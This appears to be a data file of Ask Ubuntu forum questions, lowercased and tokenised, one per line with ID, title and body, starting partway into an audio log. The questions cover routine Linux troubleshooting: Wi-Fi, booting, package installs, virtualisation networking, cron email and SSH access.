adjusting ( 8000 vs. 15699 ) . d : [ pulseaudio ] module-loopback.c : [ bluez_sink.4c_21_d0_3a_29_04 ] updated sampling rate to 8000 hz . d : [ bluetooth ] ratelimit.c : 134 events suppressed d : [ bluetooth ] memblock.c : pool full d : [ alsa-sink-alc892 analog ] memblock.c : pool full d : [ bluetooth ] memblock.c : pool full ============================================================================ please help me ! ! !
492806	how can i fetch random words from an electronic dictionary database or text file ?	is there a way to get random words from the dictionary databases like from the dict-wn or freedict 's packages ? i 'm looking for a way to do that by either using a bash script or try a command tool if available .
492807	how do i install a .src.tgz file ?	i want to install synthesia , but the creators did n't bother with a linux version ( as usual ) . they said it would run under wine 1.4 , but my wine is higher than that apparently , and i do n't know how to downgrade it . however , i saw that someone had made a linux version called linthesia [ hypertext removed due to low reputation - < 10 reputation = > 2 links not allowed in posts ] and put it up on sourceforge in the form of a .src.tgz file . i have installed both synthesia and linthesia and currently am able to use neither ( the audio does n't work in synthesia under my current version of wine ) . could someone please walk me through the steps of either installing linthesia from the .src.tgz file or downgrading my wine . thanks , num yes , there is a readme in the .src.tgz file . there is also a makefile , but when i tried to make , it did n't work because the files are still in the .src.tgz and not on my computer . here is a screenshot of the contents of the file . ariel , your answer worked until it came to installing the build dependencies . i installed build-essential and it worked fine . i then tried to install the rest of the packages and got error messages , which can be viewed here .
492809	ubuntu vm on open nebula does n't se internet connection	i have some problem with ubuntu and open nebula . i 'm trying to setup one installation of ubuntu on open nebula . start from this assumption : my machine as an i7 with 16 gb of ram and runs ubuntu 14.04. my machine is on one network with this configuration ip : 172.16.93.163 netmask : 255.255.0.0 gateway : 172.16.0.1 dns : 172.16.0.10 , 172.16.0.11 for the installation of open nebula i follow this guide : http : //docs.opennebula.org/4.6/design_and_installation/quick_starts/qs_ubuntu_kvm.html in the step 2.3 i set the file interfaces as follows : auto lo iface lo inet loopback auto br0 iface br0 inet static address 172.16.93.163 # network 192.168.0.0 netmask 255.255.0.0 # broadcast 192.168.0.255 gateway 172.16.0.1 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off in the step 3.2 i create a network file similar to this one : name = `` private '' type = fixed bridge = br0 leases = [ ip=192.168.0.100 ] leases = [ ip=192.168.0.101 ] leases = [ ip=192.168.0.102 ] the problem is that even if i reach to create a vm like described in the guide the vm is not pingable , i can not ssh to this one . if i follows other guides and have succeed in installation of a vm with ubuntu 14.04 the machine does n't recognize the ip and it remain outside of the internet also if i assign its the ip manually . however in each manner i work i do n't succeed to ping my vms in any way . somebody help me i 'm beginning mad , i 'm workin on this situation by an entire week
492813	what is the ~/.gvfs file ?	i recently made a fresh install of ubuntu 14.04 and i noticed an item .gvfs in my home folder . it is very strange , since it is visible even though it has a leading . what is even stranger is that i can not determine the owner of the file : drwxrwxr-x 2 martin martin 4096 juil . 6 17:48 .gstreamer-0.10 d ? ? ? ? ? ? ? ? ? ? ? ? ? ? .gvfs -rw-rw-r -- 1 martin martin 68 nov. 16 2013 .hgrc edit : i am sorry , i put my question too vaguely : what is the purpose of this file/directory ? why does n't it contain any information in ls -la ? what does its presence and corruption tell about my system ? what should i do with it ? why is it visible even with a preceding . ? edit2 : after reboot , the item disappeared .
492818	video streaming from 12.04 lts cli server	i am searching for a way to web connect and stream remotely . i wish to connect from the outside world to my cli server . i use vlc mostly since it seems to play everything , but need a solution for my server . most of the links involve the gui version of ubuntu . i already have ftp , ssh and www running on the server ( if that helps ) . most of the programs that i have seen are written for the gui version . thanks in advance . even the youtube demos are for gui . a program name , link to a way to do it , or a full doc would be great !
492821	wifi not detecting !	in my ubuntu 12.04 wifi suddenly stopped showing . although my bluetooth is orking perfectly . can someone help me out here ? ? i am a newbie . please tell me which commands to run to help you solve this problem
492824	setting up new user allowed actions	i made a new user but have been trying to research how to limit their ability to make changes to the system . i am basically looking for them to having the ability to change ifconfig settings . beyond that i do not want them playing around with the system . does anyone know how to do this ? everything i look up online is about adding users and making them have root privileges . are there any in depth guides to user management and privileges . looking for : way to set a user to only be able to change ifconfig information . ( set ip address and so on ) in depth guides for user management and privileges/permissions .
492825	ubuntu stops booting at 'stopping network device security '	i 'm having issues with my ubuntu to boot . worked fine yesterday but i think some updates has made my box to fail booting . i remove the 'quiet ' and 'splash ' from grub cmdline to see what is happening when it tries to boot . everything seems to start/stop fine except when it reaches 'stopping configure network device security ' . it just hangs there the last few lines look like this : starting configure network device security [ ok ] stopping configure network device [ ok ] stopping configure network device security [ ok ] also , it show 's that gnome display manager that it failed starting , not sure if that has something to do with it or not . any ideas on how to solve this ?
492830	how to integrate libvirt with libxl of xen 4.4 ?	i 'm running xen 4.4 with ubuntu 14.04 without any problems , like this : root @ hyper-xen-1 : ~ # xl li name id mem vcpus state time ( s ) domain-0 0 5431 8 r -- -- - 32652.8 svr01 19 4096 4 -b -- -- 28842.6 app-1 29 2048 4 -b -- -- 4906.0 svr02 31 2048 4 -b -- -- 4186.5 svr03 32 2048 4 -b -- -- 5216.1 but , libvirt is unable to see those running virtual machines , look : root @ hyper-xen-1 : ~ # virsh -c xen : ///system list -- all id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- so , how can i fully integrate libvirt , with xen when using libxl ? also , the virt-manager is n't working either ... thanks in advance ! best , thiago
492831	issue with sublime text unity icon	i just installed sublime text 3 via the terminal from the following commands : sudo add-apt-repository ppa : webupd8team/sublime-text-3 sudo apt-get update sudo apt-get install sublime-text-installer i added the sublime launcher to my unity bar , however when i click on it , instead of activating that icon , a grey question mark icon appears in the buttom of the tray like so ( it 's partially cut off ) : http : //i.imgur.com/olmi5mb.jpg . how do i fix this ? thanks !
492832	problems initializing docpad on ubuntu [ solved ]	i installed docpad on ubuntu 14.04 without any problem but when i want to initiate a project with docpad command ( or any related commands from docpad ) the first time question about accepting privacy policy appears again and again and after that nothing happens , not even an error , warning or log message . any same problem such this ? besides i use these versions : nodejs 0.10.29 npm 1.4.14 docpad 6.69.0 note : there is a bug in tos of docpad which is described in github , so for the first time of running your docpad instance remember to add -- offline flag to your command . for example to initiate a simple project with no skeleton use docpad init -- offline
492833	duplicate file ~ in root folder	i have a copy of all the files in my root folder with ~ symbol . i can see it on the terminal but not in the folder . how do i stop this
492835	why does my computer say `` missing operating system '' when computer restarts .	i have just recently decided to make the switch from os x to ubuntu after one of my friends let me play around with his computer . however , when i was trying to partition my hardrive so i could run both alongside each other i accidentally wiped the entire drive . luckily i was able to create a bootable usb with ubuntu loaded on it . when i boot up my computer ( with the usb in ) my mac has the system menu that lets me either try , install , choose the oem install , or test the disk for defects . i 've gone through the install process a few times , but when i try to reboot my computer without the usb in , my computer says `` missing operating system '' . i 've read through a few of the other questions , but none of the threads i 've seen are in my particular situation where they completely wiped their drive . any help would be appreciated , and i 'm ecstatic to start using ubuntu once i get this figured out ! ; )
492836	dual boot data lost possibilities	diskdrive has 4 partitions c : d : e : f : c : drive has windows xp and d : drive is completely free . how i can install ubuntu 14.04 lts on d : drive and which partition and mount type i should use , so will my data lost on drive other e : and f : ?
492841	decrypted files from ecryptfs-homefolder not readable ! ( letter salad )	i just decrypted the encrypted home-folder of a linux mint 12-system with this command ecryptfs-recover-private after i had mounted it and i get this message , too : info : success ! private data mounted at [ /tmp/ecryptfs. ] ... . as root i can see every file and every directory , but all in this directory looks like this : drwxrwxr-x 2 1000 1000 4096 jan 25 2012ecryptfs_fnek_encrypted.fwyms5wm2iz3jut4bmngwawpskhuqq8aw6x03lw9lqohqallbklerixfkk -- drwxr -- r -- 2 1000 1000 4096 feb 23 2012 ecryptfs_fnek_encrypted.fwyms5wm2iz3jut4bmngwawpskhuqq8aw6x05hwq2unk2ucsxt9rlqyyfe -- drwxrwxr-x 2 1000 1000 4096 jan 16 2012 ecryptfs_fnek_encrypted.fwyms5wm2iz3jut4bmngwawpskhuqq8aw6x05l0oceetu0eor.unwdwts -- - can anybody help ? i 'm looking for a solution since this morning . emc
492843	manipulating users ' computers remotely	i need some service similar to windows terminal services , which provides the ability to host multiple , simultaneous client sessions . so , users run their applications on a remote server as if on their local computers . and i need a possibility to switch to their session and intercept their mouse and manipulate their computer remotely . say , i 'll have 10 users simultaneously . under windows this is pretty natural via rdp ( if i 'm not mistaken ) , but i would like to migrate from windows world . could you tell me whether this is possible under ubuntu or some other unix system ? if yes , please , give me a link so that i could read some general information .
492844	unity 's dash ( search ) blur is gone	recently i installed the preview of unity8 on top of 14.04 x64 , but since it was n't working i removed it along with all the packages manually because they would n't be removed automatically . after that i also got an update for my graphics drivers ( have an intel ironlake mobile chipset with open source drivers ) from the oibaf ppa . updated and rebooted . all of a sudden the blur from the dash is gone . playing with the settings in unity tweak tool or ccsm did n't help . re-installing unity also did n't help . i 'm quite sure i did n't remove any essential desktop component . when i removed ubuntu one files i got notified it would remove ubuntu-desktop , which i re-installed using sudo apt-get install -f ubuntu-desktop since it said that there are damaged packages after removing unity8 with mir . so far everything seems to be working , all but the blur is gone when i hit super and transparency in the logout dialogs as well . i 'm not entirely sure should switching search blur on and off affect dialogue transparency . can anyone confirm ?
492847	how to change session when on macbuntu theme ?	learning about the xmonad session , i downloaded it , but as of now i am unable to change session due to macbuntu theme as it has no such selection criteria in login screen , is there anyway to change session using cli ?
492848	ubuntu 14.04 freezed when too much memory in malloced	i am trying to run a c program which mallocs the memory as per the input given by user . whenever i input something as big as 1000000000 rather than returning null value , my ubuntu 14.04 machine freezes completely ! i can upload the code if needed but i am damn sure that malloc is the culprit ... but i am surprised to see ubuntu freeze ! does anyone have any idea about why this may be happening ? i have a laptop with 12gb ram , i5 processor and 500gb harddisk . here is the code : # include < stdio.h > # include < stdlib.h > # define left ( x ) ( 2* ( x ) +1 ) # define right ( x ) ( 2* ( x ) +2 ) long long int *err , *sorted , *size , *id ; short int *repeat ; void max_heapify ( long long int *arr , long long int length , long long int index ) { long long int largest , left , right , temp , flag = 1 ; while ( flag ) { left = left ( index ) ; right = right ( index ) ; if ( left < length & & arr [ left ] > arr [ index ] ) largest = left ; else largest = index ; if ( right < length & & arr [ right ] > arr [ largest ] ) largest = right ; if ( largest ! = index ) { temp = arr [ index ] ; arr [ index ] = arr [ largest ] ; arr [ largest ] = temp ; index = largest ; } else flag = 0 ; } } void build_max_heap ( long long int *arr , long long int length ) { long long int i , j ; j = ( length / 2 ) - 1 ; for ( i = j ; i > = 0 ; i -- ) max_heapify ( arr , length , i ) ; } void heapsort ( long long int *arr , long long int length ) { long long int i , temp , templength ; build_max_heap ( arr , length ) ; templength = length ; for ( i = 0 ; i < templength ; i++ ) { temp = arr [ 0 ] ; // maximum number arr [ 0 ] = arr [ length - 1 ] ; arr [ length - 1 ] = temp ; length -- ; max_heapify ( arr , length , 0 ) ; } } int main ( ) { long long int n , k , p , i , j ; scanf ( `` % lld % lld % lld '' , & n , & k , & p ) ; err = ( long long int* ) malloc ( ( n + 1 ) * sizeof ( long long int ) ) ; //repeat = ( short int* ) calloc ( 1000000001 , sizeof ( short int ) ) ; sorted = ( long long int* ) malloc ( ( n + 1 ) * sizeof ( long long int ) ) ; j = 0 ; for ( i = 0 ; i < n ; i++ ) { scanf ( `` % lld '' , & err [ i ] ) ; sorted [ j++ ] = err [ i ] ; } heapsort ( sorted , j ) ; for ( i = 0 ; i < j ; i++ ) printf ( `` % lld , `` , sorted [ i ] ) ; //these malloc statements cause the problem ! ! id = ( long long int* ) malloc ( ( sorted [ j - 1 ] + 1 ) * sizeof ( long long int ) ) ; size = ( long long int* ) malloc ( ( sorted [ j - 1 ] + 1 ) * sizeof ( long long int ) ) ; for ( i = 0 ; i < = sorted [ j - 1 ] ; i++ ) { id [ i ] = i ; size [ i ] = 1 ; } return 0 ; } basically i am trying to sort the numbers and then allocate the array of size of maximum element . this program works for smaller input but when i enter this 5 5 5 1000000000 999999999 999999997 999999995 999999994 it freezes ubuntu ..i even added the condition to check if id or size is null but that did n't help !
492849	ubuntu bootloader issue	i 've made ubuntu 14.04 dual boot with windows 8.1. , but after installing ubuntu everything is working well , but after 1-2 day ( s ) , i do n't see my boot option menu after powering on my system ; it directly boots into windows 8.1 . to fix it i ran the following commands in the ubuntu terminal : sudo add-apt-repository ppa : yannubuntu/boot-repair sudo sh -c `` sed -i 's/trusty/saucy/g ' /etc/apt/sources.list.d/yannubuntu-boot-repair-trusty.list sudo apt-get update sudo apt-get install -y boot-repair & & boot-repair then everything ran well but after some time i do n't see boot option menu after powering on the device . is there any permanent solution for this issue ?
492852	sending email from cron with correct format	i am stuck when sending email in correct format from cron jobs executing my php script which fetches records from mysql database . i have a php script which fetches records from database and renders in < html > format when echod in browser like starttime endtime count user count apps 12:00:00 12:59:59 0 0 01:00:00 01:59:59 0 0 02:00:00 02:59:59 0 0 03:00:00 03:59:59 0 0 04:00:00 04:59:59 0 0 05:00:00 05:59:59 0 0 06:00:00 06:59:59 0 0 07:00:00 07:59:59 0 0 08:00:00 08:59:59 0 0 in my php script i use simple mail ( ) and to send mail i use headers like $ headers = 'mime-version : 1.0 ' . `` \r\n '' ; $ headers .= 'content-type : text/html ; charset=utf-8 ' . `` \r\n '' ; mail ( `` someemail @ example.com '' , $ subject , $ message ) ; i set my cron job by typing like crontab -e //which opens `vi` editor there i set mailto= '' someemail @ example.com '' 10 * * * * php /var/www/html/xyz/myfile.php its sending mail every hour past 10 min but the format goes wrong.its sending mail in a format like < html > < head > < title > count user info timewise < /title > < /head > < h2 > count user/application in currentdate < /h2 > < body > < table border= '' 3 '' cellspacing= '' 2 '' > < tr > < th > starttime < /th > < th > endtime < /th > < th > count user < /th > < th > count apps < /th > < /tr > < tr > < td > 12:00:00 < /td > < td > 12:59:59 < /td > < td > 1 < /td > < td > 1 < /td > < /tr > < tr > < td > 13:00:00 < /td > < td > 13:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 14:00:00 < /td > < td > 14:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 15:00:00 < /td > < td > 15:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 16:00:00 < /td > < td > 16:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 17:00:00 < /td > < td > 17:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 18:00:00 < /td > < td > 18:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 19:00:00 < /td > < td > 19:59:59 < /td > < td > 2 < /td > < td > 2 < /td > < /tr > < tr > < td > 20:00:00 < /td > < td > 20:59:59 < /td > < td > 1 < /td > < td > 1 < /td > < /tr > < tr > < td > 21:00:00 < /td > < td > 21:59:59 < /td > < td > 0 < /td > < td > 0 < /td > < /tr > < tr > < td > 22:00:00 < /td > < td > 22:59:59 < /td > < td > 0 < /td > < td > 0 < /td > < /tr > < /body > < /table > < /html > how can i send mail in the correct format like shown when its echoed in browser ? and how can i set cron to send email from 1pm to 11pm . my php script < ? php $ con=mysql_connect ( `` localhost '' , '' root '' , '' '' ) ; mysql_select_db ( `` dbname '' , $ con ) ; $ to= '' some @ example.com '' $ subject = 'count user login and application ' ; //fetch between 06:00:00 to 08:30:00 09:00:00 to 10:00:00 $ date=array ( '06:00:00 ' , '09:00:00 ' ) ; $ date1=array ( '08:30:00 ' , '10:00:00 ' ) ; $ msg = ' < html > < head > ' ; $ msg .= ' < title > some title < /title > ' ; $ msg .= ' < /head > ' ; $ msg .= ' < h1 > test user < /h1 > ' ; $ msg .= ' < table border= '' 1 '' cellspacing= '' 1 '' > ' ; $ msg .= `` < tr > '' ; $ msg .= `` < th > start time < /th > '' ; $ msg .= `` < th > end time < /th > '' ; $ msg .= `` < th > count < /th > '' ; $ count=count ( $ date ) ; for ( $ i=0 ; $ i < $ count ; $ i++ ) { $ sql= '' select count ( * ) as test from table_name where date_format ( sys_time , ' % h : % m : % i ' ) between date_format ( sys_time , ' $ date [ $ i ] ' ) and date_format ( sys_time , ' $ date1 [ $ i ] ' ) `` ; $ query=mysql_query ( $ sql ) ; if ( ! $ query ) { die ( 'could not connect'.mysql_error ( ) ) ; } while ( $ row=mysql_fetch_array ( $ query ) ) { $ msg .= `` < tr > '' ; $ str= $ row [ 'test ' ] ; $ subcategory = explode ( ' , ' , $ str ) ; foreach ( $ subcategory as $ value ) { $ msg .= `` < td > '' . $ value . `` < /td > '' ; } $ msg .= `` < /tr > '' ; } } $ msg .= `` < /table > '' ; $ msg .= `` < /html > '' ; // to send html mail , the content-type header must be set $ headers = 'mime-version : 1.0 ' . `` \r\n '' ; $ headers .= 'content-type : text/html ; charset=iso-8859-1 ' . `` \r\n '' ; mail ( $ to , $ subject , $ msg ) ; ? > please help
492856	how to add shortcut for xfce application menu	i have xfce in my desktop , and i want to make a keyboard shortcut for super_l and super_r ( known as windows keys ) to open my applications menu . what is the command ?
492858	two wifi connections-only one is working , ubuntu 12.04 and 13.10	i have ubuntu 12.04 in one partition and ubuntu 13.10 ( today upgraded to 14.04 ) in the other partition of gazelle professional ( system 76 ) . i have two wifi connections . one from my university and other from orange . both work fine on 12.04 , but my university connection was not working on 13.10 and after upgrade also it is not working . any help is appreciated . thank you
492859	cgroups memory subsystem	i want to know if i can set dynamic limits to the memory subsystem in a cgroup . currently i have the oom disabled and a dummy process to test the control group , when the limit in memory is reached , the process freezes ( as expected ) but when i try to set a larger limit ( like 2 times more memory ) , the echo command fails and the process keeps frozen . how can i set dynamic memory usage limits in a cgroup without moving the processes to another cgroup with the new limits set ?
492863	install pygame in anaconda	i have anaconda on ubuntu 14.04 . i want to install the pygame module with anaconda . i already run sudo apt-get install python-pygame , but this only works on python , not in anaconda .
492864	how to install trendnet tpl-406e2k powerline adapter in ubuntu 14.04	how can i install a trendnet tpl-406e2k powerline adapter in ubuntu 14.04 ? is it possible ? ( i am brand new to linux so please be gentle . )
492867	how do i remove the `` switch input method '' icon from my desktop ?	there is a small icon in the corner of my screen in lubuntu 12.04 . it looks like this : the computer runs a display monitor and i need to remove the icon , i can drag it around including off the screen , but after each reboot it goes back into the corner . any ideas on how i can remove this icon ? it 's got me stumped .
492871	what is the right way to restart dependent services while package installation ?	i am creating a configuration package , and would like to stop and restart services whose configuration is affected . right now i am using the service [ stop|restart ] in { pre , post } { inst , rm } way . i read in a question somewhere that invoke-rc.d is the right way , because it honours user preferences about a service . however , i could n't find any guidelines about this . does anyone know of such guidelines ? or have any advice as to which way i should pick ? the package is of internal use , and will likely only be for 14.04 for the next two years . however , i 'd like to leave as clean a state as possible for my successor , so systemd is in my mind as well . from the invoke-rc.d man page : all access to the init scripts by debian packages ' maintainer scripts should be done through invoke-rc.d . from the debian polcy manual , chapter 9 , section 3.3 : maintainers should use the abstraction layer provided by the update-rc.d and invoke-rc.d programs to deal with initscripts in their packages ' scripts such as postinst , prerm and postrm . ... the package maintainer scripts must use invoke-rc.d to invoke the /etc/init.d/* initscripts , instead of calling them directly . debian has been using sysv-init and will shift directly to systemd , and i suppose the policy manual will be updated in due time to refer to systemctl . however , what i am uncertain about is this : should i use invoke-rc.d instead of service ? i can tell dpkg that i am interested in some files ( via triggers ) , so is there a way to tell dpkg that i am interested in some services as well and get dpkg to do the restarting/reloading ? to clarify : i am not writing init scripts . i am providing a package with configuration for other applications , like puppet , ntp , etc. , so i stop and restart the corresponding services in the scripts . here , for example , is a docker issue about invoke-rc.d vs service . the issue is still open , with one person , probably a maintainer , commenting that they are definitely interested in doing this the right way - clearly neither of us are sure what that is . ( my question is independent of that issue . )
492874	use ubuntu-html5-app-launcher , canvas.addeventlistener ( “mousedown” … triggered when up the mouse button	i use ubuntu-html5-app-launcher my code : ... ... canvas.removeeventlistener ( `` mousedown '' , newgame , false ) ; canvas.addeventlistener ( `` mousedown '' , oncanvasdown , false ) ; canvas.addeventlistener ( `` mouseup '' , oncanvasup , false ) ; ... ... when i down the button , no event triggers . when i up the button , mousedown and mouseup at the same trigger .
492876	xfce4 alt f2 - xfrun4 command impotent in 14.04 trusty	i get used to run simple commands using alt+f2 shortcut in 12.04 lts precise . most of them needed sudo , others dont but mostly those are simply terminal commands . so there must be checked `` run in terminal '' , and if started by sudo , password was asked . but even xnc4viewer , asked for password.. in terminal . now there is no checkbox to `` run in terminal '' . so , i can run almost nothing now , after upgrade in trusty 14.04 lts . each time have to start xterm , and command history is very different too.. only gui applications.. terminal commands dont run , or they stay hidden somewhere in invisible space ? seems to me , it is replacement to void value app , instead of very usefull one . probably , i just do not know howto use it . but google did not help me this time . i do not know how to configure something like xfrun4 , or how to downgrade whole xfce4 ( yes i would be happy ) , or whatever app can be used instead , or what else i could do to return xfce4 to state how it was in 12.04 lts precise . i think i must use trusty , because of new hardware ( some intel haswell and baytrail boards ) .
492878	ubuntu 14.04lts installed wont boot	ive just installed ubuntu 14.04lts , pc dont want to boot , tell me can not boot install a proper boot device and blablabla . i did make sure everything was fine in my bios i dont have windows installed . i tried boot-repair but still dosent want to boot ! ! ! boot-repair http : //paste.ubuntu.com/7761811/
492881	need help booting into windows	needless to say i am fairly new to this . here is the problem i have encountered . was on windows 7 and made a new partition for ubuntu installation . after installing ubuntu on the said partition i can only boot into ubuntu , windows was not an option until i manually added it in /boot/grub/grub.cfg using the following lines : menuentry `` windows 7 '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' chainloader +1 } the option is now available but it wo n't boot ( returns an error saying something about signatures ) . i also tried the following code : menuentry `` windows '' { set root= ( hd0,3 ) //tried both , hd0,2 and hd0,3 chainloader +1 } it returned an error saying bootmgr is missing.. here is what fdisk -l returns : device boot start end blocks id system /dev/sda1 2048 52435641 26216797 83 linux /dev/sda2 52436992 52641791 102400 82 linux swap / solaris /dev/sda3 * 52641792 200241151 73799680 7 hpfs/ntfs/exfat /dev/sda4 200243198 242184191 20970497 f w95 ext 'd ( lba ) /dev/sda5 200243200 242184191 20970496 7 hpfs/ntfs/exfat r00t @ admin-box : ~ $ sda3 = windows partition please help i beg you !
492882	x2go error after connection lost	i have encountered this error second time in past week . first time i tried to restart xubuntu but in never started again so i have to reinstall it.i was connected to my xubuntu 14.04 dedicated server and then disconnected with `` connection lost '' error , when i tried to reconnect i got this error . can anyone help me ? i tried to search this error message with google but with no luck . error message
492885	does the package unattended-upgrades upgrade major versions or just minor ones	i know this package can update minor version , say 12 . 04 . 02 to 12 . 04 . 04 and even bigger jobs . but does it also do major version jumps - say version 12 to 13 or 14 ? without any human interaction . thinking about making a private mirror and when i put version 14 ( tahr ) in the mirror the unattended-upgrades package should update all the slaves to 14 automagically .
492887	ubuntu on virtualbox problem	i installed ubuntu on a virtualbox and i can only see the middle of the desktop ? here is a screenshot :
492888	xubuntu install consistently fails on uefi systems	today i installed xubuntu 14.04 on a 5th laptop . this laptop had uefi enabled by default . so far i have installed xubuntu 13.10 and 14.04 on about 10 different laptops , all of which had uefi enabled . and my observation is that if you disable checking for package updates at install time , then , the installation goes through , but the laptop does not boot into the newly installed xubuntu . conversely , if you let the installer check for package updates during install then post installation , the laptop does boot into the newly installed xubuntu . my questions are : what causes the boot failure when you disable checking for package updates at install time ? any idea why the xubuntu folks decided to not fix this bug/problem in 14.04 when it was well known in 13.10 ? your help is greatly appreciated .
492889	how to prevent accidental unlocking ?	i have a machine at work running tmux and xmonad that i lock with slock . i frequently need to ssh into it from a remote location , and , based on testing this in person , accidentally killing the slock process will inevitably lead to the ssh host unlocking and becoming suddenly accessible to anyone in the vicinity . the ideal solution would be not to kill the slock process , but it 's simply too easy to accidentally nuke a tmux window/pane running it or to kill it in some other way and completely forget to slock again afterwards . i 'm trying to figure out if there 's a `` safer '' and more human-proof way of locking my machine , but still making it accessible through ssh . i have n't tested this extensively , but i suspect the same issue would n't occur if i was using unity . is there perhaps an slock alternative i could consider ? thoughts ?
492890	usb keyboard and mouse not working after upgrade	i recently upgraded from ubuntu 12.04 to 14.04 . the first time from shut-down , the usb keyboard and mouse do n't work at all , but if i restart it works fine . why is this ?
492891	why ca n't i change permissions for share	so , i have a external hard drive that i am trying to share on my network . it is plugged into the usb on my tvpc , and i want to be able to access and change folders and files from my laptop . when i go to change permissions with the gui , i click the drop down and click to change permissions , but even if i click read and write under guests or other , it will automatically change back to `` none . '' i have no idea how to fix this and i cant access my files from another computer . any help ? !
492895	dropbox icon disappears on restart	the dropbox icon is not displaying on the indicator panel in the top right hand corner . i tried to implement this solution and it works temporarily after i start and stop dropbox as suggested . however , upon restart dropbox starts up but its icon is nowhere to be found .
492897	software updater is not starting in ubuntu 14.04	when i click on the software updater it just wo n't start and restarting the computer does n't help either . doing sudo ap-get update in a terminal gives following error : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . muddassir @ nexus : ~ $ traceback ( most recent call last ) : file `` /usr/share/appgrid/appdata.py '' , line 229 , in < module > rebuild_db ( ) file `` /usr/share/appgrid/appdata.py '' , line 119 , in rebuild_db from appdata.apps.aptapp import aptapp , all_apt_pkgnames file `` /usr/share/appgrid/appdata/apps/aptapp.py '' , line 10 , in < module > cache = cache ( ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 151 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . and using sudo update-manager , gives the same error as above .
492899	xubuntu terminal cursor	i am running xubuntu 14.04 and the default terminal emulator ( xfterm i think ) . the terminal itself is fine but i want to change the cursor to a blinking underline rather than a solid block . how do i do this ? ca n't see anything in the settings .
492901	ca n't view or access files saved to storage partition from ubuntu in windows 7 partition	i recently set up a dual boot of ubuntu 12.04 and windows 7 on my new thinkpad t440s . i have a 1tb hdd for most stuff and a 16gb ssd as a caching drive . i followed this tutorial for the dual boot instructions . the partitions are set up so that there 's a partition for each os and a partition for storage . my problem is that i have full access to the files in storage from ubuntu , but anything new that i save to storage from ubuntu is invisible from windows . what 's worse is that when i reboot from being in windows and go back to ubuntu , the file is gone . i 've seen that other people have had this problem too , but there does n't seem to be an answer on any other thread . if someone can help , then i 'll post links to your answer on the other threads . can someone please help me get full access to all of my files from both oss ? for what it 's worth here is the fdisk -l output detailing my partitions : device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sda2 3074048 971935743 484430848 7 hpfs/ntfs/exfat /dev/sda3 1076793344 1953523711 438365184 7 hpfs/ntfs/exfat /dev/sda4 971937790 1076793343 52427777 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 971937792 1060622335 44342272 83 linux /dev/sda6 1060624384 1076793343 8084480 82 linux swap / solaris
492905	hp envy 14 - wireless not working ( ubuntu 14.04 )	have not been able to use wireless on ubuntu 14.04 , my laptop is hp envy 14 . i have tried everything possible in the last 2 days . there are lots of issues with my laptop or should i say wireless device . please see all issues below . somethings the wireless device does not showup at top right of the screen and whenever it shows , i get messages like `` device not ready '' , `` wireless is disabled by hardware switch '' or the device will be grayed out . when system is booting , i noticed this error `` iwlwifi failed to load firmware chunk '' whenever wireless is enabled , the system becomes very slow and drags . i always boot to bios , reset settings to default before the system will recognize the wireless . and this leads to point 3 above . please i need help ! demob @ amazo : ~ $ sudo lshw -c network [ sudo ] password for demob : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 03 serial : 64:31:50:94:41 : b3 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff memory : c0420000-c043ffff *-network description : network controller product : centrino advanced-n 6200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 35 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : driver=iwlwifi latency=0 resources : irq:45 memory : c2400000-c2401fff demob @ amazo : ~ $ iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning .
492908	connection refused - despite iptables rule is accept and port is open	i am trying to setup an ssh service . i am behind a residential router , and connecting to the desktop on a laptop computer . i use the the local ip of the desktop ( 192.1 ... ) for address . the server is ubuntu lucid and i have the openssh service running . checking with netstat antlp |grep listen shows port 22 is listening . iptables entry ( sudo iptables -l ) shows incoming traffic on port 22 is open ( accept anywhere/anywhere ) . on the laptop , when i try nc -z ip 22 -v , i get connection refused error no matter how many times i tried with different interval . really baffled and do n't know what else could be the reason . any ideas ?
